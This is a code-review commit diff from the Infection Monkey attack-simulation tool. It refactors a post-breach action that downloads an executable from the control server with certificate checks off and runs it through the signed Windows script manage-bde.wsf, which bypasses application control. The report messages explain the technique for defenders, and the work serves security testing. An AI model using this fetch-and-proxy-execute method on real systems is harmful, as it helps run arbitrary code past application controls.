CR changes

This commit is contained in:
Shreya 2020-08-24 18:14:10 +05:30
parent 984a8c2251
commit 989286857b
6 changed files with 33 additions and 17 deletions

View File

@ -0,0 +1 @@
T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download'

View File

@ -2,12 +2,14 @@ import json
import logging import logging
import platform import platform
from socket import gethostname from socket import gethostname
from urllib.parse import urljoin
import requests import requests
from requests.exceptions import ConnectionError from requests.exceptions import ConnectionError
import infection_monkey.monkeyfs as monkeyfs import infection_monkey.monkeyfs as monkeyfs
import infection_monkey.tunnel as tunnel import infection_monkey.tunnel as tunnel
from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
from infection_monkey.config import GUID, WormConfiguration from infection_monkey.config import GUID, WormConfiguration
from infection_monkey.network.info import check_internet_access, local_ips from infection_monkey.network.info import check_internet_access, local_ips
from infection_monkey.transport.http import HTTPConnectProxy from infection_monkey.transport.http import HTTPConnectProxy
@ -328,7 +330,8 @@ class ControlClient(object):
@staticmethod @staticmethod
def get_T1216_pba_file(): def get_T1216_pba_file():
try: try:
return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server, # noqa: DUO123 return requests.get(urljoin(f"https://{WormConfiguration.current_server}/", # noqa: DUO123
T1216_PBA_FILE_DOWNLOAD_PATH),
verify=False, verify=False,
proxies=ControlClient.proxies, proxies=ControlClient.proxies,
stream=True) stream=True)

View File

@ -1,3 +1,4 @@
import logging
import subprocess import subprocess
from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
@ -6,6 +7,8 @@ from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import
cleanup_changes, get_commands_to_proxy_execution_using_signed_script) cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
from infection_monkey.utils.environment import is_windows_os from infection_monkey.utils.environment import is_windows_os
LOG = logging.getLogger(__name__)
class SignedScriptProxyExecution(PBA): class SignedScriptProxyExecution(PBA):
def __init__(self): def __init__(self):
@ -14,11 +17,14 @@ class SignedScriptProxyExecution(PBA):
windows_cmd=' '.join(windows_cmds)) windows_cmd=' '.join(windows_cmds))
def run(self): def run(self):
original_comspec = '' try:
if is_windows_os(): original_comspec = ''
original_comspec =\ if is_windows_os():
subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116 original_comspec =\
subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116
super().run() super().run()
except Exception as e:
cleanup_changes(original_comspec) LOG.warning(f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}")
finally:
cleanup_changes(original_comspec)

View File

@ -1,5 +1,4 @@
import os import os
import subprocess
from infection_monkey.control import ControlClient from infection_monkey.control import ControlClient
@ -8,11 +7,11 @@ TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe')
def get_windows_commands_to_proxy_execution_using_signed_script(): def get_windows_commands_to_proxy_execution_using_signed_script():
download = ControlClient.get_T1216_pba_file() download = ControlClient.get_T1216_pba_file()
with open(TEMP_COMSPEC, 'wb') as file_obj: with open(TEMP_COMSPEC, 'wb') as random_exe_obj:
file_obj.write(download.content) random_exe_obj.write(download.content)
file_obj.flush() random_exe_obj.flush()
windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116 windir_path = os.environ['WINDIR']
signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf') signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf')
return [ return [

View File

@ -6,6 +6,7 @@ from flask import Flask, Response, send_from_directory
from werkzeug.exceptions import NotFound from werkzeug.exceptions import NotFound
import monkey_island.cc.environment.environment_singleton as env_singleton import monkey_island.cc.environment.environment_singleton as env_singleton
from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
from monkey_island.cc.database import database, mongo from monkey_island.cc.database import database, mongo
from monkey_island.cc.resources.attack.attack_config import AttackConfiguration from monkey_island.cc.resources.attack.attack_config import AttackConfiguration
@ -132,7 +133,7 @@ def init_api_resources(api):
api.add_resource(Log, '/api/log', '/api/log/') api.add_resource(Log, '/api/log', '/api/log/')
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/') api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>') api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/') api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH)
api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>', api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
'/api/fileUpload/<string:file_type>?load=<string:filename>', '/api/fileUpload/<string:file_type>?load=<string:filename>',
'/api/fileUpload/<string:file_type>?restore=<string:filename>') '/api/fileUpload/<string:file_type>?restore=<string:filename>')

View File

@ -8,8 +8,14 @@ __author__ = "shreyamalviya"
class T1216(PostBreachTechnique): class T1216(PostBreachTechnique):
tech_id = "T1216" tech_id = "T1216"
unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\ unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\
"pre-existing signed script since it didn't run on any Windows machines." "pre-existing signed script since it didn't run on any Windows machines. " +\
"If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
"bypass application control and signature validation on systems."
scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\ scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\
"pre-existing signed script on Windows but failed." "pre-existing signed script on Windows but failed. " +\
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows." "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
"bypass application control and signature validation on systems."
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. " +\
"This behavior could be abused by adversaries to execute malicious files that could " +\
"bypass application control and signature validation on systems."
pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC] pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]